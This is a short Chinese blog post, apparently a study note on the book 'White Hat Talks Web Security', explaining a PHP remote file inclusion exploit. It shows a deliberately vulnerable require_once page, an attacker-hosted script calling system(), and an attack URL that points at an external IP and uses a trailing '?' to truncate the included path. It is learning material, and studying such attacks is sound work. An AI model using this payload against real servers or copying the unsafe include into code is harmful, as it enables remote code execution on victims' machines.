php远程文件包含截断问题

今天在学习《白帽子讲web安全》一书是,提到一个php远程文件包含漏洞

可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令

服务器中有漏洞的页面代码为:

复制代码
#test.php
#
error_reporting(0); $route="share"; $basePath=$_GET['param']; if ($route == "share") { require_once $basePath.'/action/mshare.php'; } elseif ($route == "sharelink") { require_once $basePath.'/action/m_shareliink.php'; }
复制代码

攻击者服务器中的攻击脚本为:

#test1.txt
<?php system("ver;"); #此处可以自己定义要执行的命令 ?>

攻击者可以构造如下url远程调用攻击者服务器上的攻击脚本:

/test.php/?param=http://23.105.202.153/test.txt?

最后的问号会截断require_once在$basePath参数后的字符串

 

这里有一个问题,就是攻击者的攻击脚本只能保存为txt格式,而不能保存为php格式,否则会导致攻击脚本无法在受害者机器上运行。

还有一个问题需要解决,就是无法向攻击者编写的脚本传递参数,如果攻击者脚本加入了参数,则会导致无法截断,这一问题需要解决。

posted @   隐念笎  阅读(1850)  评论(1编辑  收藏  举报
编辑推荐:
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异
· 三行代码完成国际化适配,妙~啊~
点击右上角即可分享
微信分享提示